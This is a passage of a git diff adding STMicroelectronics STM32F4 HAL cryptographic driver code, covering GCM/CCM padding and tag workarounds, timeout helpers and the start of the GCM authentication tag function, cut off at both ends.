block optionally pad the data with zeros*/ + for (loopcounter = 0U; loopcounter < lastwordsize; loopcounter++) + { + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + } + while (loopcounter < 4U) + { + /* Pad the data with zeros to have a complete block */ + hcryp->Instance->DINR = 0x0U; + loopcounter++; + } + } + } + else if (((headersize_in_bytes / 4U) - (hcryp->CrypHeaderCount)) >= 4U) + { + /* Write the input block in the IN FIFO */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++; + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++; + } + else /*HeaderSize < 4 or HeaderSize >4 & HeaderSize %4 != 0*/ + { + /* Last block optionally pad the data with zeros*/ + for (loopcounter = 0U; loopcounter < ((headersize_in_bytes / 4U) % 4U); loopcounter++) + { + hcryp->Instance->DINR = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + hcryp->CrypHeaderCount++ ; + } + /* If the header size is a multiple of words */ + if ((headersize_in_bytes % 4U) == 0U) + { + /* Pad the data with zeros to have a complete block */ + while (loopcounter < 4U) + { + hcryp->Instance->DINR = 0x0U; + loopcounter++; + hcryp->CrypHeaderCount++; + } + } + else + { + /* Enter last bytes, padded with zeros */ + tmp = *(uint32_t *)(hcryp->Init.Header + hcryp->CrypHeaderCount); + tmp &= mask[(hcryp->Init.DataType * 2U) + (headersize_in_bytes % 4U)]; + hcryp->Instance->DINR = tmp; + loopcounter++; + hcryp->CrypHeaderCount++; + /* Pad the data with zeros to have a complete block */ + while (loopcounter < 4U) + { + hcryp->Instance->DINR = 0x0U; + loopcounter++; + hcryp->CrypHeaderCount++; + } + } + } +#endif /* End AES or CRYP */ +} + + +/** + * @brief Workaround used for GCM/CCM mode. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param Timeout: specify Timeout value + * @retval None + */ +static void CRYP_Workaround(CRYP_HandleTypeDef *hcryp, uint32_t Timeout) +{ + uint32_t lastwordsize; + uint32_t npblb; +#if defined(CRYP) + uint32_t iv1temp; + uint32_t temp[4] = {0}; + uint32_t temp2[4] = {0}; +#endif /* CRYP */ + uint32_t intermediate_data[4] = {0}; + uint32_t index; + + /* Compute the number of padding bytes in last block of payload */ + npblb = ((((uint32_t)(hcryp->Size) / 16U) + 1U) * 16U) - (uint32_t)(hcryp->Size); + + /* Number of valid words (lastwordsize) in last block */ + if ((npblb % 4U) == 0U) + { + lastwordsize = (16U - npblb) / 4U; + } + else + { + lastwordsize = ((16U - npblb) / 4U) + 1U; + } + +#if defined(CRYP) + + /* Workaround 2, case GCM encryption */ + if (hcryp->Init.Algorithm == CRYP_AES_GCM) + { + if ((hcryp->Instance->CR & CRYP_CR_ALGODIR) == CRYP_OPERATINGMODE_ENCRYPT) + { + /*Workaround in order to properly compute authentication tags while doing + a GCM encryption with the last block of payload size inferior to 128 bits*/ + /* Disable CRYP to start the final phase */ + __HAL_CRYP_DISABLE(hcryp); + + /*Update CRYP_IV1R register and ALGOMODE*/ + hcryp->Instance->IV1RR = ((hcryp->Instance->CSGCMCCM7R) - 1U); + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGOMODE, CRYP_AES_CTR); + + /* Enable CRYP to start the final phase */ + __HAL_CRYP_ENABLE(hcryp); + } + /* Last block optionally pad the data with zeros*/ + for (index = 0; index < lastwordsize; index ++) + { + /* Write the last input block in the IN FIFO */ + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + } + while (index < 4U) + { + /* Pad the data with zeros to have a complete block */ + hcryp->Instance->DIN = 0U; + index++; + } + /* Wait for OFNE flag to be raised */ + if (CRYP_WaitOnOFNEFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + if ((hcryp->Instance->SR & CRYP_FLAG_OFNE) != 0x0U) + { + for (index = 0U; index < 4U; index++) + { + /* Read the output block from the output FIFO */ + intermediate_data[index] = hcryp->Instance->DOUT; + + /* Intermediate data buffer to be used in for the workaround*/ + *(uint32_t *)(hcryp->pCrypOutBuffPtr + (hcryp->CrypOutCount)) = intermediate_data[index]; + hcryp->CrypOutCount++; + } + } + + if ((hcryp->Instance->CR & CRYP_CR_ALGODIR) == CRYP_OPERATINGMODE_ENCRYPT) + { + /*workaround in order to properly compute authentication tags while doing + a GCM encryption with the last block of payload size inferior to 128 bits*/ + /* Change the AES mode to GCM mode and Select Final phase */ + /* configured CHMOD GCM */ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGOMODE, CRYP_AES_GCM); + + /* configured final phase */ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_GCM_CCMPH, CRYP_PHASE_FINAL); + + if ((hcryp->Instance->CR & CRYP_CR_DATATYPE) == CRYP_DATATYPE_32B) + { + if ((npblb % 4U) == 1U) + { + intermediate_data[lastwordsize - 1U] &= 0xFFFFFF00U; + } + if ((npblb % 4U) == 2U) + { + intermediate_data[lastwordsize - 1U] &= 0xFFFF0000U; + } + if ((npblb % 4U) == 3U) + { + intermediate_data[lastwordsize - 1U] &= 0xFF000000U; + } + } + else if ((hcryp->Instance->CR & CRYP_CR_DATATYPE) == CRYP_DATATYPE_8B) + { + if ((npblb % 4U) == 1U) + { + intermediate_data[lastwordsize - 1U] &= __REV(0xFFFFFF00U); + } + if ((npblb % 4U) == 2U) + { + intermediate_data[lastwordsize - 1U] &= __REV(0xFFFF0000U); + } + if ((npblb % 4U) == 3U) + { + intermediate_data[lastwordsize - 1U] &= __REV(0xFF000000U); + } + } + else if ((hcryp->Instance->CR & CRYP_CR_DATATYPE) == CRYP_DATATYPE_16B) + { + if ((npblb % 4U) == 1U) + { + intermediate_data[lastwordsize - 1U] &= __ROR((0xFFFFFF00U), 16); + } + if ((npblb % 4U) == 2U) + { + intermediate_data[lastwordsize - 1U] &= __ROR((0xFFFF0000U), 16); + } + if ((npblb % 4U) == 3U) + { + intermediate_data[lastwordsize - 1U] &= __ROR((0xFF000000U), 16); + } + } + else /*CRYP_DATATYPE_1B*/ + { + if ((npblb % 4U) == 1U) + { + intermediate_data[lastwordsize - 1U] &= __RBIT(0xFFFFFF00U); + } + if ((npblb % 4U) == 2U) + { + intermediate_data[lastwordsize - 1U] &= __RBIT(0xFFFF0000U); + } + if ((npblb % 4U) == 3U) + { + intermediate_data[lastwordsize - 1U] &= __RBIT(0xFF000000U); + } + } + for (index = 0U; index < lastwordsize; index ++) + { + /*Write the intermediate_data in the IN FIFO */ + hcryp->Instance->DIN = intermediate_data[index]; + } + while (index < 4U) + { + /* Pad the data with zeros to have a complete block */ + hcryp->Instance->DIN = 0x0U; + index++; + } + /* Wait for OFNE flag to be raised */ + if (CRYP_WaitOnOFNEFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + + if ((hcryp->Instance->SR & CRYP_FLAG_OFNE) != 0x0U) + { + for (index = 0U; index < 4U; index++) + { + intermediate_data[index] = hcryp->Instance->DOUT; + } + } + } + } /* End of GCM encryption */ + else + { + /* Workaround 2, case CCM decryption, in order to properly compute + authentication tags while doing a CCM decryption with the last block + of payload size inferior to 128 bits*/ + + if ((hcryp->Instance->CR & CRYP_CR_ALGODIR) == CRYP_OPERATINGMODE_DECRYPT) + { + iv1temp = hcryp->Instance->CSGCMCCM7R; + + /* Disable CRYP to start the final phase */ + __HAL_CRYP_DISABLE(hcryp); + + temp[0] = hcryp->Instance->CSGCMCCM0R; + temp[1] = hcryp->Instance->CSGCMCCM1R; + temp[2] = hcryp->Instance->CSGCMCCM2R; + temp[3] = hcryp->Instance->CSGCMCCM3R; + + hcryp->Instance->IV1RR = iv1temp; + + /* Configured CHMOD CTR */ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGOMODE, CRYP_AES_CTR); + + /* Enable CRYP to start the final phase */ + __HAL_CRYP_ENABLE(hcryp); + } + /* Last block optionally pad the data with zeros*/ + for (index = 0; index < lastwordsize; index ++) + { + /* Write the last Input block in the IN FIFO */ + hcryp->Instance->DIN = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + } + while (index < 4U) + { + /* Pad the data with zeros to have a complete block */ + hcryp->Instance->DIN = 0U; + index++; + } + /* Wait for OFNE flag to be raised */ + if (CRYP_WaitOnOFNEFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1U) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + + if ((hcryp->Instance->SR & CRYP_FLAG_OFNE) != 0x0U) + { + for (index = 0U; index < 4U; index++) + { + /* Read the Output block from the Output FIFO */ + intermediate_data[index] = hcryp->Instance->DOUT; + + /*intermediate data buffer to be used in for the workaround*/ + *(uint32_t *)(hcryp->pCrypOutBuffPtr + (hcryp->CrypOutCount)) = intermediate_data[index]; + hcryp->CrypOutCount++; + } + } + + if ((hcryp->Instance->CR & CRYP_CR_ALGODIR) == CRYP_OPERATINGMODE_DECRYPT) + { + temp2[0] = hcryp->Instance->CSGCMCCM0R; + temp2[1] = hcryp->Instance->CSGCMCCM1R; + temp2[2] = hcryp->Instance->CSGCMCCM2R; + temp2[3] = hcryp->Instance->CSGCMCCM3R; + + /* configured CHMOD CCM */ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_ALGOMODE, CRYP_AES_CCM); + + /* configured Header phase */ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_GCM_CCMPH, CRYP_PHASE_HEADER); + + /*set to zero the bits corresponding to the padded bits*/ + for (index = lastwordsize; index < 4U; index ++) + { + intermediate_data[index] = 0U; + } + if ((npblb % 4U) == 1U) + { + intermediate_data[lastwordsize - 1U] &= 0xFFFFFF00U; + } + if ((npblb % 4U) == 2U) + { + intermediate_data[lastwordsize - 1U] &= 0xFFFF0000U; + } + if ((npblb % 4U) == 3U) + { + intermediate_data[lastwordsize - 1U] &= 0xFF000000U; + } + for (index = 0U; index < 4U ; index ++) + { + intermediate_data[index] ^= temp[index]; + intermediate_data[index] ^= temp2[index]; + } + for (index = 0U; index < 4U; index ++) + { + /* Write the last Input block in the IN FIFO */ + hcryp->Instance->DIN = intermediate_data[index] ; + } + + /* Wait for BUSY flag to be raised */ + if (CRYP_WaitOnBUSYFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1U) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + } + } /* End of CCM WKA*/ + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); + +#else /* AES */ + + /*Workaround 2: case GCM encryption, during payload phase and before inserting + the last block of paylaod, which size is inferior to 128 bits */ + + if ((hcryp->Instance->CR & AES_CR_MODE) == CRYP_OPERATINGMODE_ENCRYPT) + { + /* configured CHMOD CTR */ + MODIFY_REG(hcryp->Instance->CR, AES_CR_CHMOD, CRYP_AES_CTR); + } + /* last block optionally pad the data with zeros*/ + for (index = 0U; index < lastwordsize; index ++) + { + /* Write the last Input block in the IN FIFO */ + hcryp->Instance->DINR = *(uint32_t *)(hcryp->pCrypInBuffPtr + hcryp->CrypInCount); + hcryp->CrypInCount++; + } + while (index < 4U) + { + /* pad the data with zeros to have a complete block */ + hcryp->Instance->DINR = 0U; + index++; + } + /* Wait for CCF flag to be raised */ + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + hcryp->State = HAL_CRYP_STATE_READY; + __HAL_UNLOCK(hcryp); +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1U) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + + /* Clear CCF Flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + for (index = 0U; index < 4U; index++) + { + /* Read the Output block from the Output FIFO */ + intermediate_data[index] = hcryp->Instance->DOUTR; + + /*intermediate data buffer to be used in the workaround*/ + *(uint32_t *)(hcryp->pCrypOutBuffPtr + (hcryp->CrypOutCount)) = intermediate_data[index]; + hcryp->CrypOutCount++; + } + + if ((hcryp->Instance->CR & AES_CR_MODE) == CRYP_OPERATINGMODE_ENCRYPT) + { + /* configured CHMOD GCM */ + MODIFY_REG(hcryp->Instance->CR, AES_CR_CHMOD, CRYP_AES_GCM_GMAC); + + /* Select final phase */ + MODIFY_REG(hcryp->Instance->CR, AES_CR_GCMPH, CRYP_PHASE_FINAL); + + if ((hcryp->Instance->CR & AES_CR_DATATYPE) == CRYP_DATATYPE_32B) + { + if ((npblb % 4U) == 1U) + { + intermediate_data[lastwordsize - 1U] &= 0xFFFFFF00U; + } + if ((npblb % 4U) == 2U) + { + intermediate_data[lastwordsize - 1U] &= 0xFFFF0000U; + } + if ((npblb % 4U) == 3U) + { + intermediate_data[lastwordsize - 1U] &= 0xFF000000U; + } + } + else if ((hcryp->Instance->CR & AES_CR_DATATYPE) == CRYP_DATATYPE_8B) + { + if ((npblb % 4U) == 1U) + { + intermediate_data[lastwordsize - 1U] &= __REV(0xFFFFFF00U); + } + if ((npblb % 4U) == 2U) + { + intermediate_data[lastwordsize - 1U] &= __REV(0xFFFF0000U); + } + if ((npblb % 4U) == 3U) + { + intermediate_data[lastwordsize - 1U] &= __REV(0xFF000000U); + } + } + else if ((hcryp->Instance->CR & AES_CR_DATATYPE) == CRYP_DATATYPE_16B) + { + if ((npblb % 4U) == 1U) + { + intermediate_data[lastwordsize - 1U] &= __ROR((0xFFFFFF00U), 16); + } + if ((npblb % 4U) == 2U) + { + intermediate_data[lastwordsize - 1U] &= __ROR((0xFFFF0000U), 16); + } + if ((npblb % 4U) == 3U) + { + intermediate_data[lastwordsize - 1U] &= __ROR((0xFF000000U), 16); + } + } + else /*CRYP_DATATYPE_1B*/ + { + if ((npblb % 4U) == 1U) + { + intermediate_data[lastwordsize - 1U] &= __RBIT(0xFFFFFF00U); + } + if ((npblb % 4U) == 2U) + { + intermediate_data[lastwordsize - 1U] &= __RBIT(0xFFFF0000U); + } + if ((npblb % 4U) == 3U) + { + intermediate_data[lastwordsize - 1U] &= __RBIT(0xFF000000U); + } + } + + /*Write the intermediate_data in the IN FIFO */ + for (index = 0U; index < lastwordsize; index ++) + { + hcryp->Instance->DINR = intermediate_data[index]; + } + while (index < 4U) + { + /* pad the data with zeros to have a complete block */ + hcryp->Instance->DINR = 0U; + index++; + } + /* Wait for CCF flag to be raised */ + if (CRYP_WaitOnCCFlag(hcryp, Timeout) != HAL_OK) + { + /* Disable the CRYP peripheral clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process Unlocked */ + __HAL_UNLOCK(hcryp); +#if (USE_HAL_CRYP_REGISTER_CALLBACKS == 1U) + /*Call registered error callback*/ + hcryp->ErrorCallback(hcryp); +#else + /*Call legacy weak error callback*/ + HAL_CRYP_ErrorCallback(hcryp); +#endif /* USE_HAL_CRYP_REGISTER_CALLBACKS */ + } + /* Clear CCF Flag */ + __HAL_CRYP_CLEAR_FLAG(hcryp, CRYP_CCF_CLEAR); + + for (index = 0U; index < 4U; index++) + { + intermediate_data[index] = hcryp->Instance->DOUTR; + } + }/*End of Workaround 2*/ +#endif /* End AES or CRYP */ +} +#endif /* AES or GCM CCM defined*/ +#if defined (CRYP) +#if defined (CRYP_CR_ALGOMODE_AES_GCM) +/** + * @brief Handle CRYP hardware block Timeout when waiting for IFEM flag to be raised. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module. + * @param Timeout: Timeout duration. + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_WaitOnIFEMFlag(CRYP_HandleTypeDef *hcryp, uint32_t Timeout) +{ + uint32_t tickstart; + + /* Get timeout */ + tickstart = HAL_GetTick(); + + while (HAL_IS_BIT_CLR(hcryp->Instance->SR, CRYP_FLAG_IFEM)) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + return HAL_ERROR; + } + } + } + return HAL_OK; +} +#endif /* GCM CCM defined*/ +/** + * @brief Handle CRYP hardware block Timeout when waiting for BUSY flag to be raised. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module. + * @param Timeout: Timeout duration. + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_WaitOnBUSYFlag(CRYP_HandleTypeDef *hcryp, uint32_t Timeout) +{ + uint32_t tickstart; + + /* Get timeout */ + tickstart = HAL_GetTick(); + + while (HAL_IS_BIT_SET(hcryp->Instance->SR, CRYP_FLAG_BUSY)) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + return HAL_ERROR; + } + } + } + return HAL_OK; +} + + +/** + * @brief Handle CRYP hardware block Timeout when waiting for OFNE flag to be raised. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module. + * @param Timeout: Timeout duration. + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_WaitOnOFNEFlag(CRYP_HandleTypeDef *hcryp, uint32_t Timeout) +{ + uint32_t tickstart; + + /* Get timeout */ + tickstart = HAL_GetTick(); + + while (HAL_IS_BIT_CLR(hcryp->Instance->SR, CRYP_FLAG_OFNE)) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + return HAL_ERROR; + } + } + } + return HAL_OK; +} + +#else /* AES */ + +/** + * @brief Handle CRYP hardware block Timeout when waiting for CCF flag to be raised. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module. + * @param Timeout: Timeout duration. + * @retval HAL status + */ +static HAL_StatusTypeDef CRYP_WaitOnCCFlag(CRYP_HandleTypeDef *hcryp, uint32_t Timeout) +{ + uint32_t tickstart; + + /* Get timeout */ + tickstart = HAL_GetTick(); + + while (HAL_IS_BIT_CLR(hcryp->Instance->SR, AES_SR_CCF)) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + return HAL_ERROR; + } + } + } + return HAL_OK; +} + +#endif /* End AES or CRYP */ + + +/** + * @} + */ + + + +/** + * @} + */ + +/** + * @} + */ + +#endif /* HAL_CRYP_MODULE_ENABLED */ + + +/** + * @} + */ +#endif /* TinyAES or CRYP*/ +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_cryp_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_cryp_ex.c new file mode 100644 index 000000000..43b238a13 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_cryp_ex.c @@ -0,0 +1,681 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_cryp_ex.c + * @author MCD Application Team + * @brief Extended CRYP HAL module driver + * This file provides firmware functions to manage the following + * functionalities of CRYP extension peripheral: + * + Extended AES processing functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The CRYP extension HAL driver can be used as follows: + (#)After AES-GCM or AES-CCM Encryption/Decryption user can start following API + to get the authentication messages : + (##) HAL_CRYPEx_AESGCM_GenerateAuthTAG + (##) HAL_CRYPEx_AESCCM_GenerateAuthTAG + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ +#if defined (AES) || defined (CRYP) +#if defined (CRYP_CR_ALGOMODE_AES_GCM)|| defined (AES) +/** @defgroup CRYPEx CRYPEx + * @brief CRYP Extension HAL module driver. + * @{ + */ + + +#ifdef HAL_CRYP_MODULE_ENABLED + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @addtogroup CRYPEx_Private_Defines + * @{ + */ +#if defined(AES) +#define CRYP_PHASE_INIT 0x00000000U /*!< GCM/GMAC (or CCM) init phase */ +#define CRYP_PHASE_HEADER AES_CR_GCMPH_0 /*!< GCM/GMAC or CCM header phase */ +#define CRYP_PHASE_PAYLOAD AES_CR_GCMPH_1 /*!< GCM(/CCM) payload phase */ +#define CRYP_PHASE_FINAL AES_CR_GCMPH /*!< GCM/GMAC or CCM final phase */ + +#define CRYP_OPERATINGMODE_ENCRYPT 0x00000000U /*!< Encryption mode */ +#define CRYP_OPERATINGMODE_KEYDERIVATION AES_CR_MODE_0 /*!< Key derivation mode only used when performing ECB and CBC decryptions */ +#define CRYP_OPERATINGMODE_DECRYPT AES_CR_MODE_1 /*!< Decryption */ +#define CRYP_OPERATINGMODE_KEYDERIVATION_DECRYPT AES_CR_MODE /*!< Key derivation and decryption only used when performing ECB and CBC decryptions */ + +#else /* CRYP */ + +#define CRYP_PHASE_INIT 0x00000000U +#define CRYP_PHASE_HEADER CRYP_CR_GCM_CCMPH_0 +#define CRYP_PHASE_PAYLOAD CRYP_CR_GCM_CCMPH_1 +#define CRYP_PHASE_FINAL CRYP_CR_GCM_CCMPH + +#define CRYP_OPERATINGMODE_ENCRYPT 0x00000000U +#define CRYP_OPERATINGMODE_DECRYPT CRYP_CR_ALGODIR +#endif /* End AES or CRYP */ + +#define CRYPEx_PHASE_PROCESS 0x02U /*!< CRYP peripheral is in processing phase */ +#define CRYPEx_PHASE_FINAL 0x03U /*!< CRYP peripheral is in final phase this is relevant only with CCM and GCM modes */ + +/* CTR0 information to use in CCM algorithm */ +#define CRYP_CCM_CTR0_0 0x07FFFFFFU +#define CRYP_CCM_CTR0_3 0xFFFFFF00U + + +/** + * @} + */ + +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ + + + +/* Exported functions---------------------------------------------------------*/ +/** @addtogroup CRYPEx_Exported_Functions + * @{ + */ + +/** @defgroup CRYPEx_Exported_Functions_Group1 Extended AES processing functions + * @brief Extended processing functions. + * +@verbatim + ============================================================================== + ##### Extended AES processing functions ##### + ============================================================================== + [..] This section provides functions allowing to generate the authentication + TAG in Polling mode + (#)HAL_CRYPEx_AESGCM_GenerateAuthTAG + (#)HAL_CRYPEx_AESCCM_GenerateAuthTAG + they should be used after Encrypt/Decrypt operation. + +@endverbatim + * @{ + */ + + +/** + * @brief generate the GCM authentication TAG. + * @param hcryp: pointer to a CRYP_HandleTypeDef structure that contains + * the configuration information for CRYP module + * @param AuthTag: Pointer to the authentication buffer + * @param Timeout: Timeout duration + * @retval HAL status + */ +HAL_StatusTypeDef HAL_CRYPEx_AESGCM_GenerateAuthTAG(CRYP_HandleTypeDef *hcryp, uint32_t *AuthTag, uint32_t Timeout) +{ + uint32_t tickstart; + /* Assume first Init.HeaderSize is in words */ + uint64_t headerlength = (uint64_t)(hcryp->Init.HeaderSize) * 32U; /* Header length in bits */ + uint64_t inputlength = (uint64_t)hcryp->SizesSum * 8U; /* Input length in bits */ + uint32_t tagaddr = (uint32_t)AuthTag; + + /* Correct headerlength if Init.HeaderSize is actually in bytes */ + if (hcryp->Init.HeaderWidthUnit == CRYP_HEADERWIDTHUNIT_BYTE) + { + headerlength /= 4U; + } + + if (hcryp->State == HAL_CRYP_STATE_READY) + { + /* Process locked */ + __HAL_LOCK(hcryp); + + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_BUSY; + + /* Check if initialization phase has already been performed */ + if (hcryp->Phase == CRYPEx_PHASE_PROCESS) + { + /* Change the CRYP phase */ + hcryp->Phase = CRYPEx_PHASE_FINAL; + } + else /* Initialization phase has not been performed*/ + { + /* Disable the Peripheral */ + __HAL_CRYP_DISABLE(hcryp); + + /* Sequence error code field */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_AUTH_TAG_SEQUENCE; + + /* Change the CRYP peripheral state */ + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + +#if defined(CRYP) + + /* Disable CRYP to start the final phase */ + __HAL_CRYP_DISABLE(hcryp); + + /* Select final phase */ + MODIFY_REG(hcryp->Instance->CR, CRYP_CR_GCM_CCMPH, CRYP_PHASE_FINAL); + + /*ALGODIR bit must be set to 0.*/ + hcryp->Instance->CR &= ~CRYP_CR_ALGODIR; + + /* Enable the CRYP peripheral */ + __HAL_CRYP_ENABLE(hcryp); + + /* Write the number of bits in header (64 bits) followed by the number of bits + in the payload */ + if (hcryp->Init.DataType == CRYP_DATATYPE_1B) + { + hcryp->Instance->DIN = 0U; + hcryp->Instance->DIN = __RBIT((uint32_t)(headerlength)); + hcryp->Instance->DIN = 0U; + hcryp->Instance->DIN = __RBIT((uint32_t)(inputlength)); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_8B) + { + hcryp->Instance->DIN = 0U; + hcryp->Instance->DIN = __REV((uint32_t)(headerlength)); + hcryp->Instance->DIN = 0U; + hcryp->Instance->DIN = __REV((uint32_t)(inputlength)); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_16B) + { + hcryp->Instance->DIN = 0U; + hcryp->Instance->DIN = __ROR((uint32_t)headerlength, 16U); + hcryp->Instance->DIN = 0U; + hcryp->Instance->DIN = __ROR((uint32_t)inputlength, 16U); + } + else if (hcryp->Init.DataType == CRYP_DATATYPE_32B) + { + hcryp->Instance->DIN = 0U; + hcryp->Instance->DIN = (uint32_t)(headerlength); + hcryp->Instance->DIN = 0U; + hcryp->Instance->DIN = (uint32_t)(inputlength); + } + else + { + /* Nothing to do */ + } + + /* Wait for OFNE flag to be raised */ + tickstart = HAL_GetTick(); + while (HAL_IS_BIT_CLR(hcryp->Instance->SR, CRYP_FLAG_OFNE)) + { + /* Check for the Timeout */ + if (Timeout != HAL_MAX_DELAY) + { + if (((HAL_GetTick() - tickstart) > Timeout) || (Timeout == 0U)) + { + /* Disable the CRYP Peripheral Clock */ + __HAL_CRYP_DISABLE(hcryp); + + /* Change state */ + hcryp->ErrorCode |= HAL_CRYP_ERROR_TIMEOUT; + hcryp->State = HAL_CRYP_STATE_READY; + + /* Process unlocked */ + __HAL_UNLOCK(hcryp); + return HAL_ERROR; + } + } + } + + /* Read the authentication TAG in the output FIFO */ + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUT; + tagaddr += 4U; + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUT; + tagaddr += 4U; + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUT; + tagaddr += 4U; + *(uint32_t *)(tagaddr) = hcryp->Instance->DOUT; + +#else /* AES*/ + + /* Select final phase */ + MODIFY_REG(hcryp->Instance->CR, 